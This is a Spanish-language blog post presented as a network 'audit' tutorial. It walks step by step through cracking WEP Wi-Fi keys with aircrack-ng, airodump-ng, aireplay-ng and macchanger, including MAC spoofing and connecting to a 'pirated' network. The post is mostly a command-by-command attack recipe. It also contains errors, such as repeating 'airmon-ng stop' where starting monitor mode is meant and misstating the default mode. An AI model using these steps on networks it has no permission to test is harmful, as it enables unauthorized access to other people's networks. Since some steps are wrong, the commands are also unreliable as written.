Específicaciones técnicas
Distro: Ubuntu 9.04
Laptop: Toshiba Satellite L355
Chipset: Atheros (Red inalambrica)
Instalaciones Necesarias
Bueno para empezar la cazeria de la red primero debemos poner a punto nuestra PC o laptop para que pueda realizar la auditoría de la red, hacemos las siguientes instalaciones (en consolo y como superusuario):
apt-get install aircrack-ng
apt-get install buil-essential
apt-get install madwifi-tools
apt-get install macchanger Hecho esto, es necesario poner nuestra interfaz de red inalambrica en modo monitor dado que por defecto está en modo monitor, ¿ Cómo sé cuál es mi interfaz inalambrica?, entonces digitamos en la consola:
iwconfig
Veremos que mi interfaz es ath0 y también muestra que está en modo managed
Lo siguiente seria:
airmon-ng stop ath0
Te debe aparecer 3 columnas donde te describe tu interfaz, chipset y driver, seguimos en la linea de comandos y ponemos:
airmon-ng stop ath0
Volvemos a iwconfig y veremos que nuestra interfaz cambio a modo monitor, en mi caso cambio a ath1 mode: Monitor
Luego debemos dar de baja a nuestra interfaz con la finalidad de cambiar la dirección MAC, en este caso una genérica como 00:11:22:33:44:55, para ello ponemos:
ifconfig ath1 down
macchanger -m 00:11:22:33:44:55 ath1
ifconfig ath1 up
chekamos con iwconfig si nuestra dirección MAC ha cambiado
Muy bien hecho todos estos pasos lo siguiente es empezar con la auditoria de redes, existen varios tipos de seguridad, no he probado haer auditoria a todas estoy en ese proceso por eso publico mis avances:
Seguridad de clave WEP
En este tipo de seguridad existen dos casos, si bien es cierto que se puede obtener la clave el detalle esta en como se puede utilizar la clave, esto lo veremos al final
Otra vez en linea de comandos ponemos:
airodump-ng (nombre de nuestra interfaz) en este caso ath1, quedando asi:
airodump-ng ath1
Con el cual nos aparecerá todo el listado de redes que detectamos, en dividido en las siguientes columnas:
- BSSID: dirección de la red
- PWR : potencia de la red
- Beatcons:
- Data: datos transferidos de la red
- #/s
- CH: canal de la red
- MB: megabytes que transmite la red
- ENC: encriptado de la red
- CIPHER: cifrado de la red
- AUTH: autentificación de la red
- ESSID: nombre de la red
ENC:wep CIPHER:wep AUTH: OPN o vacia
ya seleccionada la red procedemos a lo siguiente:
airodump-ng "interfaz" -w "nombre del archivo de capturas" -c "canal en que se encuentra la red a auditar", por ejemplo quiero auditar a la red ROSA y esta en el canal 6 y al archivo lo llamare korderoman
airodump-ng ath1 -w korderoman -c 6
Con lo cual empezarán las capturas específicamente de los que se encuentren en el canal 6. Ahora en la web se recomienda obtener como minimo 150000 datos, para acelerar dicho proceso se emplea el siguiente comando:
aireplay-ng -1 0 -e "nombre de la red" -a "BSSID de la red" -h "nuestra dirección MAC que es 00:11:.... se acuerdan que la cambiaron" ath1quedando como ejemplo algo asi:
aireplay-ng -1 0 -e ROSA -a 00:18:5B:AB:60:61 -h 00:11:22:33:44:55 ath1
Se dara una autentificación y empezará la aceleración de la descarga de datos.
Cuando ya se haya descargado el total de datos (150000) hacemos lo siguiente:
aircrack-ng korderoman*.cap
Te pedira que seleciones el número de la network y seleccionas la que tenga mas IVs, y procederá a desencriptar la clave por fuerza bruta, que quiere decir ello, que prueba todas las posibilidades de clave hasta obtener un resultado.
En este punto pueden ocurrir 3 cosas:
- La clave se revela de manera hexadecimal y ASCII, se coloca la clave ASCII y listo nos conectamos.
- La clave solo se revela en forma hexadecimal con lo cual podemos recurrir a un convertor y listo. Aquí hay uno.
- La clave se revela como hexadecimal pero por mas que la convertimos sale en simbolos extraños y no nos permite acceder a al red.
El último caso es especial, pues que posiblemente no hallamos desencriptado una clave si no hallamos obtenido la llave de la red. Para ello debemos realizar el proceso con:
iwconfig
Iwconfig nombre_tu_dispositivo (ath0) essid nombre_red_pirateada key AA:AA:BC:CB:12:34:DD:98:76:EE: FF:20
Y listo , bueno este post lo seguire actualizando en cuanto a la seguridad WPA que ya es auditable.
1 comentario:
El titulo de tu post deberia ser "realizando tecnicas de vulnerabilidades WEP/WAP". El concepto de auditar una red va por otro lado.
No es simplemente romper el key es ir a indagar que mas hay en la red lan o wi fi.
Publicar un comentario